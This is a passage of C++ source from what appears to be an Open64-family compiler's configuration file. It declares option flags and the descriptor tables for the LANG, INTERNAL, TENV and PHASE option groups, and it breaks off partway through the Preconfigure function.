Fast_Complex_Set = FALSE; /* ... option seen? */ BOOL Fast_Bit_Allowed = FALSE; /* Fast inlined bit intrinsics? */ BOOL Fast_Bit_Set = FALSE; /* ... option seen? */ BOOL Fast_NINT_Allowed = FALSE; /* Fast NINT and ANINT? */ BOOL Fast_NINT_Set = FALSE; /* ... option seen? */ BOOL Fast_trunc_Allowed = FALSE; /* Fast truncs for NINT/ANINT/AINT/AMOD? */ BOOL Fast_trunc_Set = FALSE; /* ... option seen? */ BOOL Inline_Intrinsics_Allowed = TRUE; /* Inline intrinsics? Or lib calls? */ BOOL Inline_Intrinsics_Set = FALSE; /* ... option seen? */ BOOL Regions_Around_Inner_Loops = FALSE;/* Put REGIONs around inner loops? */ BOOL Region_Boundary_Info = FALSE; /* calc boundary info for regions */ BOOL Simp_Multiply_To_Shift=FALSE; /* Convert multiplies to shifts */ BOOL Enable_NaryExpr= FALSE; /* allow nary expression in the lowerer */ BOOL Enable_NaryExpr_Set = FALSE; /* ... option seen? */ /***** LANGuage group options *****/ static char *Language_Name = NULL; /* Source language name */ LANGUAGE Language = LANG_UNKNOWN; /* See language.h */ BOOL CXX_Bool_On = TRUE; BOOL CXX_Bool_Set = FALSE; BOOL CXX_Exceptions_On = TRUE; BOOL CXX_Exceptions_Set = FALSE; BOOL CXX_Alias_Const=FALSE; BOOL CXX_Alias_Const_Set=FALSE; BOOL LANG_Recursive = FALSE; BOOL LANG_Recursive_Set = FALSE; BOOL CXX_Wchar_On = TRUE; BOOL CXX_Wchar_Set = FALSE; BOOL CXX_Namespaces_On = TRUE; BOOL CXX_Namespaces_Set = FALSE; BOOL CXX_Ansi_For_Init_Scope_On = FALSE; BOOL CXX_Ansi_For_Init_Scope_Set = FALSE; BOOL CXX_Standard_C_Plus_Plus_On = FALSE; BOOL CXX_Standard_C_Plus_Plus_Set = FALSE; BOOL C_Restrict_On = FALSE; BOOL C_Restrict_Set = FALSE; char *C_Auto_Restrict = NULL; BOOL C_Auto_Restrict_Set = FALSE; BOOL FTN_Short_Circuit_On = FALSE; BOOL FTN_Short_Circuit_Set = FALSE; BOOL Macro_Expand_Pragmas_On = FALSE; BOOL Macro_Expand_Pragmas_Set = FALSE; BOOL C_VLA_On = FALSE; BOOL C_VLA_Set = FALSE; BOOL CXX_Typename_On = TRUE; BOOL CXX_Typename_Set = FALSE; BOOL CXX_Explicit_On = TRUE; BOOL CXX_Explicit_Set = FALSE; BOOL CXX_Mutable_On = TRUE; BOOL CXX_Mutable_Set = FALSE; BOOL CXX_Packed_On = FALSE; BOOL CXX_Packed_Set = FALSE; BOOL LANG_Symtab_Verify_On = TRUE; BOOL LANG_Symtab_Verify_Set = TRUE; BOOL LANG_Ansi_Setjmp_On = TRUE; BOOL LANG_Ansi_Setjmp_Set = FALSE; BOOL LANG_Ignore_Carriage_Return_On = TRUE; BOOL LANG_Ignore_Carriage_Return_Set = FALSE; BOOL LANG_Pch; BOOL LANG_Pch_Set; char *LANG_Create_Pch; BOOL LANG_Create_Pch_Set; char *LANG_Use_Pch; BOOL LANG_Use_Pch_Set; char *LANG_Pchdir; char *LANG_cxx_dialect; BOOL LANG_Pchdir_Set; BOOL LANG_cxx_dialect_Set; BOOL LANG_Microsoft_Mode = FALSE; BOOL LANG_Microsoft_Mode_Set = FALSE; /***** INTERNAL group options *****/ BOOL WHIRL_Merge_Types_On = FALSE; BOOL WHIRL_Merge_Types_Set = FALSE; BOOL WHIRL_Comma_Rcomma_On = TRUE; BOOL WHIRL_Comma_Rcomma_Set = FALSE; BOOL WHIRL_Mtype_A_On = FALSE; #ifdef TARG_IA64 BOOL WHIRL_Mtype_B_On = TRUE; #else BOOL WHIRL_Mtype_B_On = FALSE; #endif BOOL WHIRL_Mtype_BS_On = FALSE; BOOL WHIRL_Flatten_Field_On = FALSE; BOOL WHIRL_Vfcall_On = FALSE; BOOL WHIRL_Addr_Passed_On = FALSE; BOOL WHIRL_Addr_Saved_For_Passed_On = FALSE; BOOL WHIRL_Addr_Saved_On = TRUE; BOOL WHIRL_Keep_Cvt_On = DEFAULT_KEEP_CVT; BOOL Global_Pragmas_In_Dummy_PU_On = TRUE; BOOL Malloc_Free_On = TRUE; BOOL Alloca_Dealloca_On = TRUE; BOOL Barrier_Lvalues_On = TRUE; /***** F90 Heap/stack allocation threshold */ INT32 Heap_Allocation_Threshold=-1; /* Allocate objects > this on the heap * (-1 means always use stack), 0 always use heap * default is -1 */ /***** Miscellaneous code generation options *****/ INT32 Short_Data = DEF_SDATA_ELT_SIZE; /* Objects of this size in .sdata */ static BOOL Short_Data_Set = FALSE; /* ... option seen? */ INT32 Short_Lits = DEF_SDATA_ELT_SIZE; /* Literals of this size in .litX */ static BOOL Short_Lits_Set = FALSE; /* ... option seen? */ INT32 Max_Sdata_Elt_Size = DEF_SDATA_ELT_SIZE; /* -Gn: sdata size */ BOOL Constant_GP = FALSE; /* gp never changes? */ /* ==================================================================== * * Option groups (see flags.h) * * When defining a new option group, remember to not only add an * option descriptor list (e.g. Options_TENV), but also to add an * entry describing the group in Common_Option_Groups, below. * * ==================================================================== */ /* Temporary variables used for holding GOT size options during option * processing until Guaranteed_Small_GOT can be set properly: */ static BOOL Use_Small_GOT = FALSE; static BOOL Use_Large_GOT = FALSE; INT32 Gspace_Available = DEFAULT_GSPACE; /* Always force EH Region offsets to be long */ BOOL Force_Long_EH_Range_Offsets = FALSE; /* Force stack frame to use large model */ BOOL Force_Large_Stack_Model = FALSE; BOOL Force_GP_Prolog; /* force usage of gp prolog */ OPTION_LIST *Registers_Not_Allocatable = NULL; /* Unique ident from IPA */ INT32 Ipa_Ident_Number = 0; BOOL Indexed_Loads_Allowed = FALSE; /* Target environment options: */ static OPTION_DESC Options_TENV[] = { { OVK_INT32, OV_VISIBLE, FALSE, "align_aggregates", "align_ag", -1, 0, 16, &Aggregate_Alignment, NULL, "Minimum alignment to use for aggregates (structs/arrays)" }, { OVK_BOOL, OV_INTERNAL, FALSE, "aligned_copy", NULL, 0, 0, 0, &UseAlignedCopyForStructs, NULL }, { OVK_BOOL, OV_SHY, FALSE, "call_mcount", NULL, 0, 0, 0, &Call_Mcount, NULL }, { OVK_BOOL, OV_SHY, FALSE, "constant_gp", NULL, 0, 0, 0, &Constant_GP, NULL }, { OVK_BOOL, OV_SHY, FALSE, "cpic", "cp", 0, 0, 0, &Gen_PIC_Call_Shared, NULL, "Generate code for executable programs which may call DSOs" }, { OVK_BOOL, OV_VISIBLE, FALSE, "fixed_addresses", "fi", 0, 0, 0, &PIC_Fixed_Addresses, NULL }, { OVK_INT32, OV_SHY, FALSE, "Gspace", NULL, DEFAULT_GSPACE,0,INT32_MAX, &Gspace_Available, NULL, "Maximum GP-relative space available" }, { OVK_UINT32, OV_INTERNAL, FALSE, "ipa_ident", NULL, 0, 0, UINT32_MAX, &Ipa_Ident_Number, NULL, "Specify IPA timestamp number" }, { OVK_BOOL, OV_VISIBLE, FALSE, "kernel", NULL, 0, 0, 0, &Kernel_Code, NULL, "Generate code for kernel use" }, { OVK_BOOL, OV_VISIBLE, FALSE, "large_GOT", "", 0, 0, 0, &Use_Large_GOT, NULL, "Assume GOT is larger than 64K bytes" }, { OVK_NAME, OV_SHY, FALSE, "io_library", NULL, 0, 0, 0, &Library_Name, NULL }, { OVK_BOOL, OV_INTERNAL, FALSE, "large_stack", NULL, 0, 0, 0, &Force_Large_Stack_Model, NULL, "Generate code assuming >32KB stack frame" }, { OVK_BOOL, OV_VISIBLE, FALSE, "local_names", "", 0, 0, 0, &PIC_Local_Names, NULL }, { OVK_BOOL, OV_SHY, FALSE, "long_eh_offsets", "long_eh", 0, 0, 0, &Force_Long_EH_Range_Offsets, NULL }, { OVK_BOOL, OV_INTERNAL, FALSE, "non_volatile_GOT", "non_v", 0, 0, 0, &Non_Volatile_GOT, NULL, "Assume GOT is non-volatile" }, { OVK_BOOL, OV_INTERNAL, FALSE, "no_page_offset", "no_p", 0, 0, 0, &PIC_No_Page_Offset, NULL, "Don't use GOT page/offset addressing" }, { OVK_BOOL, OV_SHY, FALSE, "pic2", "pi", 0, 0, 0, &Gen_PIC_Shared, NULL, "Generate position-independent code suitable for DSOs" }, { OVK_BOOL, OV_SHY, FALSE, "pic1", NULL, 0, 0, 0, &Gen_PIC_Call_Shared, NULL, "Generate code for executable programs which may call DSOs" }, { OVK_BOOL, OV_SHY, FALSE, "profile_call", "prof", 0, 0, 0, &Gen_Profile, NULL }, { OVK_NAME, OV_SHY, FALSE, "profile_name", "", 0, 0, 0, &Gen_Profile_Name, NULL }, { OVK_BOOL, OV_VISIBLE, FALSE, "protected_names", "", 0, 0, 0, &PIC_Protected_Names, NULL }, { OVK_INT32, OV_INTERNAL, FALSE, "short_data", "short_d", 0, 0, 4096, &Short_Data, &Short_Data_Set, "Maximum size of data to allocate GP-relative" }, { OVK_INT32, OV_INTERNAL, FALSE, "short_literals", "short_l", 0, 0, 1024, &Short_Lits, &Short_Lits_Set, "Maximum size of literals to allocate GP-relative" }, { OVK_BOOL, OV_VISIBLE, FALSE, "small_GOT", "sm", 0, 0, 0, &Use_Small_GOT, NULL, "Assume GOT is smaller than 64K bytes" }, { OVK_INT32, OV_INTERNAL, FALSE, "struct_copy_loop_size", "struct_copy_loop", -1, 0, 4096, &MinStructCopyLoopSize, NULL }, { OVK_INT32, OV_INTERNAL, FALSE, "struct_copy_mem_intr_size", "struct_copy_mem", -1, 0, 4096, &MinStructCopyMemIntrSize, NULL }, { OVK_INT32, OV_VISIBLE, FALSE, "X", NULL, 1, 0, 4, &Eager_Level, &Eager_Level_Set, "Exception-enable level" }, { OVK_BOOL, OV_VISIBLE, FALSE, "zeroinit_in_bss", NULL, 0, 0, 0, &Zeroinit_in_bss, NULL, "Place zero-initialized data in .bss section" }, { OVK_BOOL, OV_SHY, FALSE, "strings_not_gprelative", "strings_not_gprel", 0, 0, 0, &Strings_Not_Gprelative, NULL, "Do not put any strings in gp-relative sections" }, { OVK_NAME, OV_SHY, FALSE, "emit_global_data", "emit_global", 0, 0, 0, &Emit_Global_Data, NULL, "only process the global data" }, { OVK_NAME, OV_SHY, FALSE, "read_global_data", "read_global", 0, 0, 0, &Read_Global_Data, NULL, "only read the already-processed global data" }, { OVK_BOOL, OV_SHY, FALSE, "force_gp_prolog", "force_gp", 0, 0, 0, &Force_GP_Prolog, NULL, "force gp_prolog to always be setup" }, { OVK_LIST, OV_VISIBLE, FALSE, "registers_not_allocatable", NULL, 0, 0, 0, &Registers_Not_Allocatable, NULL, "list of registers that are reserved and not available for allocation" }, /***** Options moved elsewhere -- retained for compatibility: *****/ /* See -DEBUG:div_check */ { OVK_INT32, OV_INTERNAL, FALSE, "check_div", "check_div", 1, 0, 3, &Initial_DEBUG.div_check, &Initial_DEBUG.div_check_set }, /* See -DEBUG:trap_uninitialized */ { OVK_BOOL, OV_INTERNAL, FALSE, "trapuv", "", 0, 0, 0, &Initial_DEBUG.trap_uv, &Initial_DEBUG.trap_uv_set }, /* See -DEBUG:trapuv_right_justify */ { OVK_BOOL, OV_INTERNAL, FALSE, "trapuv_right_justify", "trapuv_right", 0, 0, 0, &Initial_DEBUG.trap_uv_rjustify, &Initial_DEBUG.trap_uv_rjustify_set }, /***** Options moved elsewhere -- replaced: *****/ /* See -DEBUG:varargs_prototypes */ { OVK_REPLACED, OV_INTERNAL, FALSE, "varargs_prototypes", "varargs_p", 0, 0, 0, const_cast<char*>("-DEBUG:varargs_prototypes"), NULL }, /***** Obsolete options: *****/ { /* OVK_INT32, */ OVK_OBSOLETE, OV_INTERNAL, FALSE, "align_extern", NULL, 0, 0, 16, NULL, NULL, "Assume this alignment for unknown objects" }, { /* OVK_BOOL, */ OVK_OBSOLETE, OV_SHY, FALSE, "aligned", NULL, 0, 0, 0, NULL, NULL, "Assume unknown objects are properly aligned" }, { /* OVK_INT32, */ OVK_OBSOLETE, OV_INTERNAL, FALSE, "misalignment", NULL, 3, 0, 3, NULL, NULL }, { OVK_INT32, OV_INTERNAL, FALSE, "iolist_reuse", "iolist_reuse", 100, 1, INT32_MAX, &iolist_reuse_limit, NULL, "Maximum number of iolists which will share stack space" }, { OVK_COUNT } /* List terminator -- must be last */ }; #ifdef BACK_END /* Phase selection options: */ static OPTION_DESC Options_PHASE[] = { { OVK_BOOL, OV_INTERNAL, FALSE, "lno", "l", 0, 0, 0, &Run_lno, NULL}, { OVK_BOOL, OV_INTERNAL, FALSE, "wopt", "w", 0, 0, 0, &Run_wopt, NULL}, { OVK_BOOL, OV_INTERNAL, FALSE, "preopt", "p", 0, 0, 0, &Run_preopt, NULL}, { OVK_BOOL, OV_INTERNAL, FALSE, "cg", "c", 0, 0, 0, &Run_cg, NULL}, { OVK_BOOL, OV_INTERNAL, FALSE, "clist", NULL, 0, 0, 0, &Run_w2c, NULL}, { OVK_BOOL, OV_INTERNAL, FALSE, "flist", NULL, 0, 0, 0, &Run_w2f, NULL}, { OVK_BOOL, OV_INTERNAL, FALSE, "mplist", NULL, 0, 0, 0, &Run_w2fc_early, NULL}, { OVK_BOOL, OV_INTERNAL, FALSE, "purple", "", 0, 0, 0, &Run_purple, NULL}, { OVK_BOOL, OV_INTERNAL, FALSE, "ipl", "i", 0, 0, 0, &Run_ipl, NULL}, { OVK_BOOL, OV_INTERNAL, FALSE, "prompf", NULL, 0, 0, 0, &Run_prompf, NULL}, { OVK_NAME, OV_INTERNAL, FALSE, "lpath", "", 0, 0, 0, &LNO_Path, NULL}, { OVK_NAME, OV_INTERNAL, FALSE, "wpath", "", 0, 0, 0, &WOPT_Path, NULL}, { OVK_NAME, OV_INTERNAL, FALSE, "cpath", "", 0, 0, 0, &CG_Path, NULL}, { OVK_NAME, OV_INTERNAL, FALSE, "w2cpath", "", 0, 0, 0, &W2C_Path, NULL}, { OVK_NAME, OV_INTERNAL, FALSE, "w2fpath", "", 0, 0, 0, &W2F_Path, NULL}, { OVK_NAME, OV_INTERNAL, FALSE, "purpath", "", 0, 0, 0, &Purple_Path, NULL}, { OVK_NAME, OV_INTERNAL, FALSE, "ipath", "", 0, 0, 0, &Ipl_Path, NULL}, { OVK_NAME, OV_INTERNAL, FALSE, "tpath", "", 0, 0, 0, &Targ_Path, NULL}, { OVK_NAME, OV_INTERNAL, FALSE, "prompf_anl_path", "", 0, 0, 0, &Prompf_Anl_Path, NULL}, { OVK_COUNT} }; #elif defined(QIKKI_BE) static OPTION_DESC Options_PHASE[] = { { OVK_NAME, OV_INTERNAL, FALSE, "tpath", "t", 0, 0, 0, &Targ_Path, NULL}, { OVK_COUNT} }; #endif /* BACK_END */ static OPTION_DESC Options_LANG[] = { { OVK_NAME, OV_INTERNAL, FALSE, "", NULL, 0, 0, 0, &Language_Name, NULL, "Language being compiled, from front end" }, { OVK_BOOL, OV_VISIBLE, FALSE, "bool", "", 0, 0, 0, &CXX_Bool_On, &CXX_Bool_Set, "C++: enable builtin type 'bool'" }, { OVK_BOOL, OV_VISIBLE, FALSE, "exceptions", "", 0, 0, 0, &CXX_Exceptions_On, &CXX_Exceptions_Set, "C++: enable exceptions" }, #if 0 // remove it till we have a robust design { OVK_BOOL, OV_SHY, FALSE, "alias_const", "", 0, 0, 0, &CXX_Alias_Const, &CXX_Alias_Const_Set }, #endif { OVK_BOOL, OV_VISIBLE, FALSE, "recursive", "", 0, 0, 0, &LANG_Recursive, &LANG_Recursive_Set, "FORTRAN: program contains recursion" }, { OVK_BOOL, OV_VISIBLE, FALSE, "wchar_t", "", 0, 0, 0, &CXX_Wchar_On, &CXX_Wchar_Set, "C++: enable builtin type 'wchar_t'" }, { OVK_BOOL, OV_VISIBLE, FALSE, "namespaces", "namespace", 0, 0, 0, &CXX_Namespaces_On, &CXX_Namespaces_Set, "C++: enable namespaces" }, { OVK_BOOL, OV_VISIBLE, FALSE, "ansi-for-init-scope", "", 0, 0, 0, &CXX_Ansi_For_Init_Scope_On, &CXX_Ansi_For_Init_Scope_Set}, { OVK_BOOL, OV_VISIBLE, FALSE, "std", "", 0, 0, 0, &CXX_Standard_C_Plus_Plus_On, &CXX_Standard_C_Plus_Plus_Set}, { OVK_BOOL, OV_SHY, FALSE, "restrict", "", 0, 0, 0, &C_Restrict_On, &C_Restrict_Set }, { OVK_NAME, OV_VISIBLE, FALSE, "autorestrict", NULL, 0, 0, 0, &C_Auto_Restrict, &C_Auto_Restrict_Set, "Automatically set the \"restrict\" qualifier on some or all pointers" }, { OVK_BOOL, OV_INTERNAL, FALSE, "scalar_formal_ref", "", 0, 0, 0, &Scalar_Formal_Ref, NULL }, { OVK_BOOL, OV_INTERNAL, FALSE, "non_scalar_formal_ref", "", 0, 0, 0, &Non_Scalar_Formal_Ref, NULL }, { OVK_BOOL, OV_INTERNAL, FALSE, "short_circuit_conditionals", "", 0, 0, 0, &FTN_Short_Circuit_On, &FTN_Short_Circuit_Set }, { OVK_BOOL, OV_VISIBLE, FALSE, "vla", "", 0, 0, 0, &C_VLA_On, &C_VLA_Set, "C/C++: enable variable length arrays" }, { OVK_BOOL, OV_VISIBLE, FALSE, "explicit", "", 0, 0, 0, &CXX_Explicit_On, &CXX_Explicit_Set, "C++: enable explicit keyword" }, { OVK_BOOL, OV_VISIBLE, FALSE, "typename", "", 0, 0, 0, &CXX_Typename_On, &CXX_Typename_Set, "C++: enable typename keyword" }, { OVK_BOOL, OV_VISIBLE, FALSE, "mutable", "", 0, 0, 0, &CXX_Mutable_On, &CXX_Mutable_Set, "C++: enable mutable keyword" }, { OVK_BOOL, OV_VISIBLE, FALSE, "macro_expand_pragmas", "", 0, 0, 0, &Macro_Expand_Pragmas_On, &Macro_Expand_Pragmas_Set, "C/C++: enable macro expansion in pragmas" }, { OVK_BOOL, OV_VISIBLE, FALSE, "packed", "", 0, 0, 0, &CXX_Packed_On, &CXX_Packed_Set, "C++: enable pragma pack" }, { OVK_BOOL, OV_INTERNAL, FALSE, "symtab_verify", "", 0, 0, 0, &LANG_Symtab_Verify_On, &LANG_Symtab_Verify_Set }, { OVK_BOOL, OV_VISIBLE, FALSE, "pch", NULL, 0, 0, 0, &LANG_Pch, &LANG_Pch_Set, "Create a precompiled header for this compilation unit" }, { OVK_NAME, OV_VISIBLE, FALSE, "create_pch", NULL, 0, 0, 0, &LANG_Create_Pch, &LANG_Create_Pch_Set, "Create a precompiled header file named by this option" }, { OVK_NAME, OV_VISIBLE, FALSE, "use_pch", NULL, 0, 0, 0, &LANG_Use_Pch, &LANG_Use_Pch_Set, "Use the precompiled header file named by this option" }, { OVK_NAME, OV_VISIBLE, FALSE, "pch_dir", NULL, 0, 0, 0, &LANG_Pchdir, &LANG_Pchdir_Set, "Create/Use from the directory named by this option" }, { OVK_BOOL, OV_VISIBLE, FALSE, "ansi_setjmp", "", 0, 0, 0, &LANG_Ansi_Setjmp_On, &LANG_Ansi_Setjmp_Set, "C/C++: enable optimization of functions with calls to setjmp" }, { OVK_BOOL, OV_VISIBLE, FALSE, "microsoft_extensions", "microsoft_extension", 0, 0, 0, &LANG_Microsoft_Mode, &LANG_Microsoft_Mode_Set}, { OVK_INT32,OV_VISIBLE, TRUE, "heap_allocation_threshold", "heap_a", -1, -1, INT32_MAX, &Heap_Allocation_Threshold, NULL, "Size threshold for switching from stack to heap allocation" }, { OVK_NAME, OV_VISIBLE, FALSE, "cxx_dialect", NULL, 0, 0, 0, &LANG_cxx_dialect, &LANG_cxx_dialect_Set}, { OVK_BOOL, OV_VISIBLE, FALSE, "ignore_carriage_return", "", 0, 0, 0, &LANG_Ignore_Carriage_Return_On, &LANG_Ignore_Carriage_Return_Set, "C/C++: ignore carriage returns in source" }, { OVK_COUNT } /* List terminator -- must be last */ }; static OPTION_DESC Options_INTERNAL[] = { { OVK_BOOL, OV_INTERNAL, FALSE, "comma_rcomma", "", 0, 0, 0, &WHIRL_Comma_Rcomma_On, &WHIRL_Comma_Rcomma_Set }, { OVK_BOOL, OV_INTERNAL, FALSE, "merge_types", "", 0, 0, 0, &WHIRL_Merge_Types_On, &WHIRL_Merge_Types_Set }, { OVK_BOOL, OV_INTERNAL, FALSE, "mtype_a", NULL, 0, 0, 0, &WHIRL_Mtype_A_On, NULL }, { OVK_BOOL, OV_INTERNAL, FALSE, "mtype_b", NULL, 0, 0, 0, &WHIRL_Mtype_B_On, NULL }, { OVK_BOOL, OV_INTERNAL, FALSE, "mtype_bs", NULL, 0, 0, 0, &WHIRL_Mtype_BS_On, NULL }, { OVK_BOOL, OV_INTERNAL, FALSE, "return_val", NULL, 0, 0, 0, &WHIRL_Return_Val_On, NULL }, { OVK_BOOL, OV_INTERNAL, FALSE, "flatten_field", NULL, 0, 0, 0, &WHIRL_Flatten_Field_On, NULL }, { OVK_BOOL, OV_INTERNAL, FALSE, "mldid_mstid", NULL, 0, 0, 0, &WHIRL_Mldid_Mstid_On, NULL }, { OVK_BOOL, OV_INTERNAL, FALSE, "vfcall", NULL, 0, 0, 0, &WHIRL_Vfcall_On, NULL }, { OVK_BOOL, OV_INTERNAL, FALSE, "addr_passed", NULL, 0, 0, 0, &WHIRL_Addr_Passed_On, NULL }, { OVK_BOOL, OV_INTERNAL, FALSE, "addr_saved_for_passed", NULL, 0, 0, 0, &WHIRL_Addr_Saved_For_Passed_On, NULL }, { OVK_BOOL, OV_INTERNAL, FALSE, "addr_saved", NULL, 0, 0, 0, &WHIRL_Addr_Saved_On, NULL }, { OVK_BOOL, OV_INTERNAL, FALSE, "keep_cvt", NULL, 0, 0, 0, &WHIRL_Keep_Cvt_On, NULL }, { OVK_BOOL, OV_INTERNAL, FALSE, "return_info", NULL, 0, 0, 0, &WHIRL_Return_Info_On, NULL }, { OVK_BOOL, OV_INTERNAL, FALSE, "global_pragmas", NULL, 0, 0, 0, &Global_Pragmas_In_Dummy_PU_On, NULL }, { OVK_BOOL, OV_INTERNAL, FALSE, "malloc_free", NULL, 0, 0, 0, &Malloc_Free_On, NULL }, { OVK_BOOL, OV_INTERNAL, FALSE, "alloca_dealloca", NULL, 0, 0, 0, &Alloca_Dealloca_On, NULL }, { OVK_BOOL, OV_INTERNAL, FALSE, "barrier_lvalues", NULL, 0, 0, 0, &Barrier_Lvalues_On, NULL }, { OVK_BOOL, OV_INTERNAL, FALSE, "mask_shift_counts", NULL, 0, 0, 0, &ARCH_mask_shift_counts, NULL }, { OVK_BOOL, OV_INTERNAL, FALSE, "generate_nor", NULL, 0, 0, 0, &ARCH_generate_nor, NULL }, { OVK_COUNT } /* List terminator -- must be last */ }; OPTION_GROUP Common_Option_Groups[] = { { "DEBUG", ':', '=', Options_DEBUG, NULL, "Options to assist debugging" }, { "INLINE", ':', '=', Options_INLINE, NULL, "Options to control subprogram inlining" }, { "INTERNAL", ':', '=', Options_INTERNAL, NULL, "Options to control internal flags for testing" }, { "IPA", ':', '=', Options_IPA, NULL, "Options to control interprocedural analysis and optimization" }, { "LANG", ':', '=', Options_LANG, NULL, "Options to control source language interpretation" }, { "LIST", ':', '=', Options_LIST, NULL, "Options to control the listing file" }, { "OPT", ':', '=', Options_OPT, NULL, "Options to control general optimization" }, #ifdef BACK_END { "LNO", ':', '=', Options_LNO, NULL, "Options to control loop nest optimization" }, #endif /* BACK_END */ #if defined(BACK_END) || defined(QIKKI_BE) { "PHASE", ':', '=', Options_PHASE, NULL, "Options to control phase invocation and locations" }, #endif /* defined(BACK_END) || defined(QIKKI_BE) */ { "TARG", ':', '=', Options_TARG, NULL, "Options to specify the target machine characteristics" }, { "TENV", ':', '=', Options_TENV, NULL, "Options to set or assert target environment characteristics" }, { "WOPT", ':', '=', Options_WOPT, NULL, "Options to control internal WHIRL optimization" }, { "VHO", ':', '=', Options_VHO, NULL, "Options to control internal VH WHIRL optimization" }, { "FLIST", ':', '=', Options_FLIST, NULL, "Options to control listing of transformed f77 source" }, { "CLIST", ':', '=', Options_CLIST, NULL, "Options to control listing of transformed C source" }, { "PURPLE", ':', '=', Options_PURPLE, NULL, "Options to control program region extraction process" }, { "PROMP", ':', '=', Options_PROMP, NULL, "Options to control listing mp transformations" }, { NULL } /* List terminator -- must be last */ }; /* ==================================================================== * * Miscellaneous data declarations and initialization * * ==================================================================== */ /* What is the model to be used for logical values in Fortran? */ BOOL Use_C_Like_Logicals = TRUE; /* Is exception-handling enabled in C++? */ BOOL Allow_Exceptions = TRUE; /***** Compiler debug/trace options *****/ BOOL Tracing_Enabled = FALSE; /* Any trace options set? */ /***** Miscellaneous optimization options *****/ /* Should idict commute operands in seeking match? */ BOOL Idict_Commutable_Match = FALSE; BOOL Scalar_Formal_Ref = TRUE; /* for fortran scalar formal refs */ BOOL Non_Scalar_Formal_Ref = FALSE; /* for fortran non_scalar formal refs */ BOOL CG_mem_intrinsics = TRUE; /* for memory intrinsic expansion */ INT32 CG_memmove_inst_count = 16; /* for intrinsic expansion of bzero etc */ BOOL CG_memmove_inst_count_overridden = FALSE; BOOL CG_bcopy_cannot_overlap = FALSE; /* for intrinsic expansion of bcopy */ BOOL CG_memcpy_cannot_overlap = FALSE; /* for intrinsic expansion of memcpy */ BOOL CG_memmove_cannot_overlap = FALSE; /* for intrinsic expansion of memmove */ BOOL CG_memmove_nonconst = FALSE; /* expand mem intrinsics unknown size */ /***** Miscellaneous GOPT options *****/ INT32 Opt_Level = DEF_OPT_LEVEL; INT32 OPT_unroll_times = 4; /* but see Configure_Target() */ BOOL OPT_unroll_times_overridden = FALSE; INT32 OPT_unroll_size = 40; /* but see Configure_CG_Options() */ BOOL OPT_unroll_size_overridden = FALSE; INT32 Const_Copy_TN_CNT = DEF_CONST_COPY_TN_CNT; BOOL Enable_BB_Splitting = TRUE; INT32 Split_BB_Length = DEF_BBLENGTH; BOOL Enable_SWP = FALSE; /* but see cgdriver.c */ BOOL Enable_SWP_overridden = FALSE; /***** What is the byte sex of the host and target? *****/ UINT8 Host_Byte_Sex = BIG_ENDIAN; /* Set in config_host.c */ UINT8 Target_Byte_Sex = BIG_ENDIAN; /* Set in config_targ.c */ BOOL Same_Byte_Sex = TRUE; /* Set in config_targ.c */ /***** Miscellaneous code generation options *****/ BOOL Use_Base_Ptrs = TRUE; /* Explicit ptrs to .DATA./.RDATA? */ BOOL Gen_PIC_Call_Shared = FALSE; /* CPIC */ BOOL Gen_PIC_Shared = FALSE; /* PIC */ BOOL Gen_PIC_Calls = FALSE; /* PIC calls */ BOOL Guaranteed_Small_GOT = TRUE; /* GOT < 64kB? */ BOOL Non_Volatile_GOT = FALSE; /* GOT entries volatile? */ BOOL PIC_Local_Names = FALSE; /* Names local by default? */ BOOL PIC_Protected_Names = FALSE; /* Names protected by default? */ BOOL PIC_Fixed_Addresses = FALSE; /* Names fixed by default? */ BOOL PIC_No_Page_Offset = FALSE; /* Don't use page/offset addressing? */ BOOL Force_Mem_Formals = FALSE; /* Always force formals to memory? */ BOOL Kernel_Code = FALSE; /* Compiling OS kernel? */ BOOL Varargs_Prototypes = TRUE; /* Varargs have prototypes for FP? */ BOOL Gen_Profile = FALSE; /* Generate a profile call for each user call */ char *Gen_Profile_Name = "__profile_call"; BOOL Call_Mcount = FALSE; /* generate a call to mcount in pu entry */ BOOL GP_Is_Preserved = FALSE; /* GP is neither caller or callee-save */ char *Emit_Global_Data = NULL; /* only emit global data */ char *Read_Global_Data = NULL; /* only read global data */ char *Library_Name = NULL; /* -TENV:io_library=xxx */ INT target_io_library; BOOL Meld_Schedule = FALSE; /* Attempt to meld basic blocks */ BOOL Gap_Schedule = FALSE; /* Attempt to perform gap scheduling */ BOOL Attempt_Bypass = FALSE; /* Attempt to use bypass registers */ BOOL Isolate_Lines = FALSE; /* Don't overlap source lines */ BOOL Fill_Delay_Slots = FALSE; /* Attempt to fill branch delay slots */ BOOL Enable_GDSE = FALSE; /* Allow global dead store elimination */ BOOL Enable_CG_Peephole =FALSE; /* Enable peephole optimization in cgprep */ #ifdef BACK_END /* back end phases options */ BOOL Run_lno = FALSE; /* run loop-nest optimizer */ BOOL Run_wopt = FALSE; /* run WHIRL global optimizer */ BOOL Run_preopt = FALSE; /* run WHIRL preopt optimizer */ BOOL Run_ipl = FALSE; /* run procedure summary phase */ BOOL Run_cg = FALSE; /* run code generator */ BOOL Run_w2c = FALSE; /* run whirl2c */ BOOL Run_thrille = FALSE; /* run UPC-Thrille instrumentation -- added by parkcs */ BOOL Run_w2f = FALSE; /* run whirl2f */ BOOL Run_w2fc_early = FALSE; /* run whirl2fc after LNO auto par*/ BOOL Run_purple = FALSE; /* run purple code instrumenter */ BOOL Run_prompf = FALSE; /* run to generate prompf analysis file */ char *LNO_Path = 0; /* path to lno.so */ char *WOPT_Path = 0; /* path to wopt.so */ char *CG_Path = 0; /* path to cg.so */ char *Ipl_Path = 0; /* path to ipl.so */ char *W2C_Path = 0; /* path to whirl2c.so */ char *W2F_Path = 0; /* path to whirl2f.so */ char *Purple_Path = 0; /* path to purple.so */ char *Prompf_Anl_Path = 0; /* path to prompf_anl.so */ WN_MAP Prompf_Id_Map = WN_MAP_UNDEFINED; /* Maps WN constructs to unique identifiers */ #endif /* BACK_END */ char *Inline_Path = 0; /* path to inline.so */ #if defined(BACK_END) || defined(QIKKI_BE) char *Targ_Path = 0; /* path to targ_info .so */ #endif /* defined(BACK_END) || defined(QIKKI_BE) */ /* ==================================================================== * * Preconfigure * * Configure compiler options prior to flag processing. * * ==================================================================== */ void Preconfigure (void) { OPTION_GROUP *og; /* Perform host-specific and target-specific configuration: */ Preconfigure_Host (); Preconfigure_Target (); /* Initialize the option groups: */ Initialize_Option_Groups ( Common_Option_Groups ); og = Get_Command_Line_Group ( Common_Option_Groups, "TARG" ); Set_Option_Internal ( og, "fp_regs" /* don't admit to this one */ ); Set_Option_Internal ( og, "mips1" /* duplicates isa=mips1 */ ); Set_Option_Internal ( og, "mips2" /* duplicates 